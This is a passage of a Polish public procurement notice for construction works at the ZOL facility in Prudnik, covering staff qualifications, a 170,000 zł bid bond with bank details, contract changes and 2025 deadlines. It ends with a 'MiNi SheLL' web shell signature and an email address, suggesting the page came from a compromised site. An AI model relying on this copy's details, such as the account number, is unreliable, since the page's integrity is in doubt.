kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych lub spełniającą wymogi, o których mowa w art. 20a ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa („świadczenie usług transgranicznych”), posiadający min. 3 letnie doświadczenie w kierowaniu w/w robotami budowlanymi oraz zrzeszony we właściwej Izbie Inżynierów Budownictwa. Kierownik budowy musi posiadać także doświadczenie w pełnieniu tej funkcji przy minimum 2 inwestycji dot. budowy, rozbudowy, nadbudowy lub przebudowy budynku użyteczności publicznej, w tym co najmniej jednego obiektu działającego w sektorze ochrony zdrowia (sanatorium, szpital, zakład opiekuńczo-leczniczy).<br/>-	kierownikiem robót posiadającym aktualne uprawnienia budowlane bez ograniczeń (specjalność ogólnobudowlana) do kierowania robotami w specjalności instalacji elektrycznej min. w ograniczonym zakresie lub uprawnienia równoważne; przynależność do właściwej izby samorządu zawodowego oraz 5 letnie doświadczenie w zakresie pełnienia funkcji kierownika budowy na co najmniej 1 robocie budowlanej budynku użyteczności publicznej.<br/>-	kierownikiem robót posiadającym aktualne uprawnienia budowlane do kierowania robotami w specjalności instalacji sanitarnej min. w ograniczonym zakresie lub uprawnienia równoważne - co najmniej 3 lata doświadczenia w zakresie pełnienia samodzielnych funkcji technicznych w budownictwie.<br/>Zamawiający dopuszcza możliwość łączenia ww. funkcji, pod warunkiem posiadania przez jedną osobę wymaganych uprawnień budowlanych. Zamawiający wskazuje, że przez uprawnienia budowlane wskazane powyżej rozumie się uprawnienia budowlane, o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2023 r., poz. 682 z późn. zm.) oraz w rozporządzeniu Ministra Infrastruktury i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019 r., poz.831) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów prawa lub uznane przez właściwy organ zgodnie z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (tj. Dz. U. z 2023 r., poz. 334). Wykonawca składający ofertę zobowiązuje się w przypadku podpisania umowy, do skierowania do pracy osób wskazanych w wykazie. W przypadkach losowych wykluczających zatrudnienie osoby wskazanej w wykazie, Wykonawca będzie zobowiązany do zatrudnienia osoby o nie mniejszych kwalifikacjach zawodowych, doświadczeniu niezbędnym do wykonania zamówienia, a także wykonywanych przez nich czynności. Zamawiający uzna warunek za spełniony na podstawie złożonego oświadczenia Wykonawcy, które stanowi wstępne potwierdzenie, że wykonawca spełnia warunki udziału w postępowaniu (załącznik nr 2 do SWZ). A w stosunku do Wykonawcy, którego oferta została najwyżej oceniona na podstawie złożonego na wezwanie Zamawiającego do przedłożenia wykazu robót budowlanych (Załącznik nr 3) wraz z dowodami, że roboty budowlane zostały wykonane należycie oraz na podstawie złożonego wykazu osób (Załącznik nr 4). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1)	Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości 170 000,00 zł (słownie: sto siedemdziesiąt tysięcy złotych; 00/100)<br/>2)	Wadium wnosi się przed upływem terminu składania ofert.Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.\<br/>3)	Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>a)	pieniądzu; <br/>b)	gwarancjach bankowych;<br/>c)	gwarancjach ubezpieczeniowych;<br/>d)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2023 r. poz. 462).<br/>4) Wadium w formie pieniądza należy wnieść przelewem na nr rachunku 23 8905 0000 2001 0021 0887 0145 w Banku Spółdzielczym w Prudniku, tytuł przelewu: „Wadium – postępowanie ZOL Prudnik”.<br/>5) Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej i musi spełniać co najmniej poniższe wymagania:<br/>a)	winno zostać złożone w postaci elektronicznej, opatrzone kwalifikowanym podpisem elektronicznym przez wystawce poręczenia lub gwarancji;	<br/>b)	musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie PZP;<br/>c)	z jej treści powinno jednoznacznie wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>d)	powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>e)	termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert); <br/>f)	w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>g)	beneficjentem poręczenia lub gwarancji jest: Prudnickie Centrum Medyczne Spółka Akcyjna w Prudniku;<br/>h)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 PZP), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>6 ) Oferta Wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 PZP zostanie odrzucona.<br/>7) Wadium w innej formie niż pieniężna wnosi się wraz z ofertą w sposób przewidziany dla oferty.<br/>8) Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje poza okolicznościami wymienionymi w SWZ oraz w art. 455 Pzp, możliwość wprowadzenia<br/>istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru<br/>Wykonawcy. Szczegółowy zakres zmian został opublikowany w Załączniku 9 projektowane postanowienia umowy, § 29 ZMIANY UMOWY <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-04 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://pcm-prudnik.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-04 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-03</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com